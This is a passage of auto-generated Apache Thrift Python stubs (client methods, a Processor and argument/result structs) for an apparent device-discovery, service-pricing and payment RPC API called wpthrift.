def initConsumer(self, scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig):
"""
Parameters:
- scheme
- hostname
- port
- urlPrefix
- clientID
- hceCard
- pspConfig
"""
self.send_initConsumer(scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig)
self.recv_initConsumer()
def send_initConsumer(self, scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig):
self._oprot.writeMessageBegin('initConsumer', TMessageType.CALL, self._seqid)
args = initConsumer_args()
args.scheme = scheme
args.hostname = hostname
args.port = port
args.urlPrefix = urlPrefix
args.clientID = clientID
args.hceCard = hceCard
args.pspConfig = pspConfig
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_initConsumer(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = initConsumer_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def initProducer(self, pspConfig):
"""
Parameters:
- pspConfig
"""
self.send_initProducer(pspConfig)
self.recv_initProducer()
def send_initProducer(self, pspConfig):
self._oprot.writeMessageBegin('initProducer', TMessageType.CALL, self._seqid)
args = initProducer_args()
args.pspConfig = pspConfig
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_initProducer(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = initProducer_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def getDevice(self):
self.send_getDevice()
return self.recv_getDevice()
def send_getDevice(self):
self._oprot.writeMessageBegin('getDevice', TMessageType.CALL, self._seqid)
args = getDevice_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getDevice(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = getDevice_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getDevice failed: unknown result")
def startServiceBroadcast(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
self.send_startServiceBroadcast(timeoutMillis)
self.recv_startServiceBroadcast()
def send_startServiceBroadcast(self, timeoutMillis):
self._oprot.writeMessageBegin('startServiceBroadcast', TMessageType.CALL, self._seqid)
args = startServiceBroadcast_args()
args.timeoutMillis = timeoutMillis
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_startServiceBroadcast(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = startServiceBroadcast_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def stopServiceBroadcast(self):
self.send_stopServiceBroadcast()
self.recv_stopServiceBroadcast()
def send_stopServiceBroadcast(self):
self._oprot.writeMessageBegin('stopServiceBroadcast', TMessageType.CALL, self._seqid)
args = stopServiceBroadcast_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_stopServiceBroadcast(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = stopServiceBroadcast_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def deviceDiscovery(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
self.send_deviceDiscovery(timeoutMillis)
return self.recv_deviceDiscovery()
def send_deviceDiscovery(self, timeoutMillis):
self._oprot.writeMessageBegin('deviceDiscovery', TMessageType.CALL, self._seqid)
args = deviceDiscovery_args()
args.timeoutMillis = timeoutMillis
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deviceDiscovery(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = deviceDiscovery_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "deviceDiscovery failed: unknown result")
def requestServices(self):
self.send_requestServices()
return self.recv_requestServices()
def send_requestServices(self):
self._oprot.writeMessageBegin('requestServices', TMessageType.CALL, self._seqid)
args = requestServices_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_requestServices(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = requestServices_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "requestServices failed: unknown result")
def getServicePrices(self, serviceId):
"""
Parameters:
- serviceId
"""
self.send_getServicePrices(serviceId)
return self.recv_getServicePrices()
def send_getServicePrices(self, serviceId):
self._oprot.writeMessageBegin('getServicePrices', TMessageType.CALL, self._seqid)
args = getServicePrices_args()
args.serviceId = serviceId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getServicePrices(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = getServicePrices_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "getServicePrices failed: unknown result")
def selectService(self, serviceId, numberOfUnits, priceId):
"""
Parameters:
- serviceId
- numberOfUnits
- priceId
"""
self.send_selectService(serviceId, numberOfUnits, priceId)
return self.recv_selectService()
def send_selectService(self, serviceId, numberOfUnits, priceId):
self._oprot.writeMessageBegin('selectService', TMessageType.CALL, self._seqid)
args = selectService_args()
args.serviceId = serviceId
args.numberOfUnits = numberOfUnits
args.priceId = priceId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_selectService(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = selectService_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "selectService failed: unknown result")
def makePayment(self, request):
"""
Parameters:
- request
"""
self.send_makePayment(request)
return self.recv_makePayment()
def send_makePayment(self, request):
self._oprot.writeMessageBegin('makePayment', TMessageType.CALL, self._seqid)
args = makePayment_args()
args.request = request
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_makePayment(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = makePayment_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "makePayment failed: unknown result")
def beginServiceDelivery(self, serviceID, serviceDeliveryToken, unitsToSupply):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsToSupply
"""
self.send_beginServiceDelivery(serviceID, serviceDeliveryToken, unitsToSupply)
return self.recv_beginServiceDelivery()
def send_beginServiceDelivery(self, serviceID, serviceDeliveryToken, unitsToSupply):
self._oprot.writeMessageBegin('beginServiceDelivery', TMessageType.CALL, self._seqid)
args = beginServiceDelivery_args()
args.serviceID = serviceID
args.serviceDeliveryToken = serviceDeliveryToken
args.unitsToSupply = unitsToSupply
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_beginServiceDelivery(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = beginServiceDelivery_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "beginServiceDelivery failed: unknown result")
def endServiceDelivery(self, serviceID, serviceDeliveryToken, unitsReceived):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsReceived
"""
self.send_endServiceDelivery(serviceID, serviceDeliveryToken, unitsReceived)
return self.recv_endServiceDelivery()
def send_endServiceDelivery(self, serviceID, serviceDeliveryToken, unitsReceived):
self._oprot.writeMessageBegin('endServiceDelivery', TMessageType.CALL, self._seqid)
args = endServiceDelivery_args()
args.serviceID = serviceID
args.serviceDeliveryToken = serviceDeliveryToken
args.unitsReceived = unitsReceived
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_endServiceDelivery(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = endServiceDelivery_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "endServiceDelivery failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["setup"] = Processor.process_setup
self._processMap["addService"] = Processor.process_addService
self._processMap["removeService"] = Processor.process_removeService
self._processMap["initConsumer"] = Processor.process_initConsumer
self._processMap["initProducer"] = Processor.process_initProducer
self._processMap["getDevice"] = Processor.process_getDevice
self._processMap["startServiceBroadcast"] = Processor.process_startServiceBroadcast
self._processMap["stopServiceBroadcast"] = Processor.process_stopServiceBroadcast
self._processMap["deviceDiscovery"] = Processor.process_deviceDiscovery
self._processMap["requestServices"] = Processor.process_requestServices
self._processMap["getServicePrices"] = Processor.process_getServicePrices
self._processMap["selectService"] = Processor.process_selectService
self._processMap["makePayment"] = Processor.process_makePayment
self._processMap["beginServiceDelivery"] = Processor.process_beginServiceDelivery
self._processMap["endServiceDelivery"] = Processor.process_endServiceDelivery
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_setup(self, seqid, iprot, oprot):
args = setup_args()
args.read(iprot)
iprot.readMessageEnd()
result = setup_result()
try:
self._handler.setup(args.name, args.description)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("setup", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_addService(self, seqid, iprot, oprot):
args = addService_args()
args.read(iprot)
iprot.readMessageEnd()
result = addService_result()
try:
self._handler.addService(args.svc)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("addService", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_removeService(self, seqid, iprot, oprot):
args = removeService_args()
args.read(iprot)
iprot.readMessageEnd()
result = removeService_result()
try:
self._handler.removeService(args.svc)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("removeService", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_initConsumer(self, seqid, iprot, oprot):
args = initConsumer_args()
args.read(iprot)
iprot.readMessageEnd()
result = initConsumer_result()
try:
self._handler.initConsumer(args.scheme, args.hostname, args.port, args.urlPrefix, args.clientID, args.hceCard, args.pspConfig)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("initConsumer", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_initProducer(self, seqid, iprot, oprot):
args = initProducer_args()
args.read(iprot)
iprot.readMessageEnd()
result = initProducer_result()
try:
self._handler.initProducer(args.pspConfig)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("initProducer", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getDevice(self, seqid, iprot, oprot):
args = getDevice_args()
args.read(iprot)
iprot.readMessageEnd()
result = getDevice_result()
try:
result.success = self._handler.getDevice()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("getDevice", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_startServiceBroadcast(self, seqid, iprot, oprot):
args = startServiceBroadcast_args()
args.read(iprot)
iprot.readMessageEnd()
result = startServiceBroadcast_result()
try:
self._handler.startServiceBroadcast(args.timeoutMillis)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("startServiceBroadcast", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_stopServiceBroadcast(self, seqid, iprot, oprot):
args = stopServiceBroadcast_args()
args.read(iprot)
iprot.readMessageEnd()
result = stopServiceBroadcast_result()
try:
self._handler.stopServiceBroadcast()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("stopServiceBroadcast", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deviceDiscovery(self, seqid, iprot, oprot):
args = deviceDiscovery_args()
args.read(iprot)
iprot.readMessageEnd()
result = deviceDiscovery_result()
try:
result.success = self._handler.deviceDiscovery(args.timeoutMillis)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("deviceDiscovery", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_requestServices(self, seqid, iprot, oprot):
args = requestServices_args()
args.read(iprot)
iprot.readMessageEnd()
result = requestServices_result()
try:
result.success = self._handler.requestServices()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("requestServices", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getServicePrices(self, seqid, iprot, oprot):
args = getServicePrices_args()
args.read(iprot)
iprot.readMessageEnd()
result = getServicePrices_result()
try:
result.success = self._handler.getServicePrices(args.serviceId)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("getServicePrices", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_selectService(self, seqid, iprot, oprot):
args = selectService_args()
args.read(iprot)
iprot.readMessageEnd()
result = selectService_result()
try:
result.success = self._handler.selectService(args.serviceId, args.numberOfUnits, args.priceId)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("selectService", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_makePayment(self, seqid, iprot, oprot):
args = makePayment_args()
args.read(iprot)
iprot.readMessageEnd()
result = makePayment_result()
try:
result.success = self._handler.makePayment(args.request)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("makePayment", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_beginServiceDelivery(self, seqid, iprot, oprot):
args = beginServiceDelivery_args()
args.read(iprot)
iprot.readMessageEnd()
result = beginServiceDelivery_result()
try:
result.success = self._handler.beginServiceDelivery(args.serviceID, args.serviceDeliveryToken, args.unitsToSupply)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("beginServiceDelivery", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_endServiceDelivery(self, seqid, iprot, oprot):
args = endServiceDelivery_args()
args.read(iprot)
iprot.readMessageEnd()
result = endServiceDelivery_result()
try:
result.success = self._handler.endServiceDelivery(args.serviceID, args.serviceDeliveryToken, args.unitsReceived)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("endServiceDelivery", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
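# NOTE (added commentary; classes below are Thrift-compiler output): each
# <method>_args / <method>_result class is a generated Thrift struct whose
# thrift_spec tuple drives the optional accelerated codec -- when
# iprot._fast_decode / oprot._fast_encode are available they serialize the
# whole struct in C, otherwise the hand-rolled read()/write() loops walk
# the fields by (fid, ftype), skipping unknown field IDs for forward
# compatibility with newer IDL revisions. A sketch of typical use, with
# illustrative values (the protocol object comes from thrift.protocol):
#   args = setup_args(name='example', description='example description')
#   args.write(oprot)   # serialize onto any TProtocol instance
#   args2 = setup_args()
#   args2.read(iprot)   # round-trips to an equal struct: args2 == args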
class setup_args(object):
"""
Attributes:
- name
- description
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', 'UTF8', None, ), # 1
(2, TType.STRING, 'description', 'UTF8', None, ), # 2
)
def __init__(self, name=None, description=None,):
self.name = name
self.description = description
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.description = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setup_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name.encode('utf-8') if sys.version_info[0] == 2 else self.name)
oprot.writeFieldEnd()
if self.description is not None:
oprot.writeFieldBegin('description', TType.STRING, 2)
oprot.writeString(self.description.encode('utf-8') if sys.version_info[0] == 2 else self.description)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class setup_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setup_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class addService_args(object):
"""
Attributes:
- svc
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'svc', (wpthrift_types.ttypes.Service, wpthrift_types.ttypes.Service.thrift_spec), None, ), # 1
)
def __init__(self, svc=None,):
self.svc = svc
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.svc = wpthrift_types.ttypes.Service()
self.svc.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addService_args')
if self.svc is not None:
oprot.writeFieldBegin('svc', TType.STRUCT, 1)
self.svc.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class addService_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('addService_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class removeService_args(object):
"""
Attributes:
- svc
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'svc', (wpthrift_types.ttypes.Service, wpthrift_types.ttypes.Service.thrift_spec), None, ), # 1
)
def __init__(self, svc=None,):
self.svc = svc
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.svc = wpthrift_types.ttypes.Service()
self.svc.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('removeService_args')
if self.svc is not None:
oprot.writeFieldBegin('svc', TType.STRUCT, 1)
self.svc.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class removeService_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
